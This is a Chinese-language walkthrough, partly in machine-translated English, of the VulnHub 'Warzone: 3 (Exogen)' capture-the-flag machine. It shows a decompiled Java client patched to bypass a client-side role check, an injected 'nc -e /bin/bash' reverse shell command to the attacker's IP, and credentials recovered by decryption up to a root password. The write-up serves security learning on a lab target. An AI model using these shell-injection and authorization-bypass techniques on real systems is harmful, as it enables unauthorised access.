当前位置:网站首页>战场:3(双子叶植物)vulnhub走读
战场:3(双子叶植物)vulnhub走读
2022-08-02 04:00:00 【xdeclearn】
Warzone: 3 (Exogen)
vulnhub地址:http://www.vulnhub.com/entry/warzone-3-exogen,606/
0x01 信息收集到获取shell
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
4444/tcp open tcpwrapped
ftp以anonymous登录,下载文件note.txt和alienclient.jar,其中notecontains the login user namealienum和密码exogenesis.
接着反编译jar包,Come to a place of interest.
在Starter.java的actionPerformed方法中,When judging user permissions,Due to local authentication problems(在ideaVerify during debugging),So add a sentence before judging user permissionsrole = "astronaut";来提升权限.
public void actionPerformed(ActionEvent e) {
if (e.getSource() == this.loginButton) {
String username = this.userTextField.getText();
String password = this.passwordField.getText();
try {
this.socket = new Socket("warzone.local", 4444);
this.os = new ObjectOutputStream(this.socket.getOutputStream());
RE login = new RE();
login.setToken(null);
login.setOption("LOGIN");
login.setCmd(null);
login.setValue(String.valueOf(username) + "@" + password);
this.os.writeObject(login);
this.is = new ObjectInputStream(this.socket.getInputStream());
RE response = (RE)this.is.readObject();
token = response.getToken();
role = token.getRole();
this.os.close();
this.socket.close();
if (response.getValue().equals("TRUE")) {
dashboard();
} else {
JOptionPane.showMessageDialog(this, "Invalid Username or Password");
}
} catch (IOException|ClassNotFoundException e1) {
e1.printStackTrace();
}
}
if (e.getSource() == this.resetButton) {
this.userTextField.setText("");
this.passwordField.setText("");
}
if (e.getSource() == this.showPassword)
if (this.showPassword.isSelected()) {
this.passwordField.setEchoChar('0');
} else {
this.passwordField.setEchoChar('*');
}
if (e.getSource() == this.viewButton)
role = "astronaut"; /*代码修改处*/
if (role.equals("researcher")) {
JOptionPane.showMessageDialog(this, "Permission Denied");
} else if (role.equals("astronaut")) {
try {
this.socket = new Socket("warzone.local", 4444);
this.os = new ObjectOutputStream(this.socket.getOutputStream());
RE list = new RE();
token.setRole(role);
list.setToken(token);
list.setOption("VIEW");
list.setCmd("LIST");
list.setValue(null);
this.os.writeObject(list);
this.is = new ObjectInputStream(this.socket.getInputStream());
RE response = (RE)this.is.readObject();
this.os.close();
this.socket.close();
reportList(response.getValue());
} catch (IOException e1) {
e1.printStackTrace();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
}
}
if (e.getSource() == this.uploadButton)
JOptionPane.showMessageDialog(this, "Has not been implemented");
}
继续跟代码,Click to view the documentation and find that the code is executedlist.setCmd("tail -5 " + f);,So change it to list.setCmd("nc -e /bin/bash 192.168.56.103 8080");,重新编译执行.
public void reportList(String value) {
JFrame view = new JFrame("View Reports");
GridLayout list = new GridLayout(2, 2);
Container containerLIst = view.getContentPane();
containerLIst.setLayout(list);
containerLIst.setBackground(Color.GRAY);
String[] files = value.split("@");
byte b;
int i;
String[] arrayOfString1;
for (i = (arrayOfString1 = files).length, b = 0; b < i; ) {
final String f = arrayOfString1[b];
if (f.contains(".txt")) {
JButton name = new JButton(f);
name.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent e) {
try {
Starter.this.socket = new Socket("warzone.local", 4444);
Starter.this.os = new ObjectOutputStream(Starter.this.socket.getOutputStream());
RE list = new RE();
list.setToken(Starter.token);
list.setOption("VIEW");
list.setValue("VALUE");
list.setCmd("nc -e /bin/bash 192.168.56.103 8080"); /*代码修改处*/
Starter.this.os.writeObject(list);
Starter.this.is = new ObjectInputStream(Starter.this.socket.getInputStream());
RE response = (RE)Starter.this.is.readObject();
Starter.this.os.close();
Starter.this.socket.close();
Starter.this.reportValue(response.getValue());
} catch (IOException e1) {
e1.printStackTrace();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
}
}
});
containerLIst.add(name);
}
b++;
}
view.setVisible(true);
view.setBounds(10, 10, 370, 600);
view.setDefaultCloseOperation(3);
view.setResizable(true);
view.show();
}
成功反弹shell.
[email protected]:~$ nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.56.103] from warzone.local [192.168.56.124] 56454
id
uid=1001(exomorph) gid=1001(exomorph) groups=1001(exomorph)
0x02 获取anunnaki用户权限
将/home/exomorph目录下的aliens.encrypted和wrz3encryptor.jar下载到本地(通过nc下载-过程略).反编译wrz3encryptor.jar.
private static void doCrypto(int cipherMode, String key, File inputFile, File outputFile) throws CryptoException {
try {
Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(cipherMode, secretKey);
FileInputStream inputStream = new FileInputStream(inputFile);
byte[] inputBytes = new byte[(int)inputFile.length()];
inputStream.read(inputBytes);
byte[] outputBytes = cipher.doFinal(inputBytes);
FileOutputStream outputStream = new FileOutputStream(outputFile);
outputStream.write(outputBytes);
inputStream.close();
outputStream.close();
} catch (NoSuchPaddingException|java.security.NoSuchAlgorithmException|java.security.InvalidKeyException|javax.crypto.BadPaddingException|javax.crypto.IllegalBlockSizeException|java.io.IOException ex) {
throw new CryptoException("Error encrypting/decrypting file", ex);
}
}
其实就是一个AES加密,看来整个warzoneThe series likes to get some encryption to confuse people.以下是解密代码:
public static void decrypt(String key, File inputFile, File outputFile) {
doDeCrypto(2, key, inputFile, outputFile);
}
private static void doDeCrypto(int cipherMode, String key, File inputFile, File outputFile) {
try {
Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(cipherMode, secretKey);
FileInputStream inputStream = new FileInputStream(inputFile);
byte[] inputBytes = new byte[(int)inputFile.length()];
inputStream.read(inputBytes);
byte[] outputBytes = cipher.doFinal(inputBytes);
FileOutputStream outputStream = new FileOutputStream(outputFile);
outputStream.write(outputBytes);
inputStream.close();
outputStream.close();
} catch (Exception ex) {
ex.printStackTrace();
}
}
The code actually doesciphermode从1改为了2,得到用户名密码anunnaki:nak1nak1...
[email protected]:~$ warzone3decrypt strings aliens.txt
minotaur:m1nom1no..
scylla:scyscy..
echidna:ech1ech1..
cyclops:cyccyc..
anunnaki:nak1nak1..
anunnaki:nak1nak2..
anunnaki:nakinaki..
sshAfter logging in, enter the user directory.
[email protected]:~$ ls
info.txt secpasskeeper.jar.gpg underboss.txt
[email protected]:~$ cat info.txt
Remember to use --batch,
otherwise the passphrase options will be ignored when you decrypt the gpg file
You know the pa[ssh]phrase
[email protected]:~$ cat underboss.txt
......
EXOGEN {
WARZONE_UNDERBOSS_AL1EN }
0x03 获取root权限
Follow the prompts to decryptsecpasskeeper.jar.gpg
[email protected]:~$ gpg -o secpasskeeper.jar -d secpasskeeper.jar.gpg #passphrase为nak1nak1..
[email protected]:~$ ls
info.txt secpasskeeper.jar secpasskeeper.jar.gpg underboss.txt
通过nc将secpasskeeper.jarDownload to local reverse analysis,将代码Main修改为
public class Main {
public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
try {
Scanner in = new Scanner(System.in);
System.out.println("[Warzone 3] Root's Password Manager");
System.out.print("Secret passphrase : ");
String secret = in.nextLine();
Cryptor cryptor = new Cryptor();
Resources res = new Resources();
String user = cryptor.decrypt(secret, removeSalt(res.getCipher()));
String sys = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
if (true/*user.equals(sys)*/) {
/*代码修改处*/
String plaintext = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
System.out.println("[+] Success, the password is : " + plaintext);
} else {
System.out.println("[x] Failed");
}
} catch (NullPointerException n) {
System.out.println("[!] Terminated");
System.exit(0);
}
}
public static String removeSalt(String salted) {
String unsalted = salted.replace("al13n", "");
return unsalted;
}
}
随意输入,得到root用户密码ufo_phosXEN.
[Warzone 3] Root's Password Manager
Secret passphrase : 123
[x] Invalid key length {
16 required}
[+] Success, the password is : ufo_phosXEN
[email protected]:~$ su - root
Password:
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# ls
boss.txt cron Desktop Documents Downloads Music Pictures Public Templates Videos
[email protected]:~# cat boss.txt
......
EXOGEN {
WARZONE_FINAL_BOSS }
by Alienum with <3
边栏推荐
- Multithreading (implementing multithreading, thread synchronization, producer and consumer)
- After the mailbox of the Pagoda Post Office is successfully set up, it can be sent but not received.
- Phpstudy installs Thinkphp6 (problem + solution)
- hackmyvm: may walkthrough
- PHP8.2的版本发布管理员和发布计划
- (7) 浅学 “爬虫” 过程 (概念+练习)
- AES加密的各种蛋疼方式方式
- web渗透必玩的靶场——DVWA靶场 1(centos8.2+phpstudy安装环境)
- Solve the problem of uni - app packaged H5 website to download image
- [trendsoft/capital]金额转中文大写库
猜你喜欢
(3) Thinkphp6 database
(7) superficial "crawlers" process (concept + practice)
(4) 函数、Bug、类与对象、封装、继承、多态、拷贝
hackmyvm: controller walkthrough
hackmyvm-random walkthrough
(3) 字符串
DVWA靶机安装教程
The roll call system and array elements find maximum and minimum values for sorting of objects
GreenOptic: 1 vulnhub walkthrough
IP access control: teach you how to implement an IP firewall with PHP
随机推荐
[phpunit/php-timer] A timer for code execution time
When PHP initiates Alipay payment, the order information is garbled and solved
Eric靶机渗透测试通关全教程
hackmyvm: again walkthrough
解决 Zlibrary 卡死/找不到域名/达到限额问题,Zlibrary最新地址
CTF之xxe
12.什么是JS
[phpunit/php-timer]一个用于代码执行时间的计时器
Add a full image watermark to an image in PHP
Orasi: 1 vulnhub walkthrough
hackmyvm: controller walkthrough
PHP有哪些杀手级超厉害框架或库或应用?
Smart Tips for Frida Scripting in Kali Environment
hackmyvm: kitty walkthrough
(3) Thinkphp6 database
12. What is JS
Pycharm打包项目为exe文件
DVWA靶机安装教程
阿里云MySQL5.7安装以及部分主要问题(总和)
Various ways of AES encryption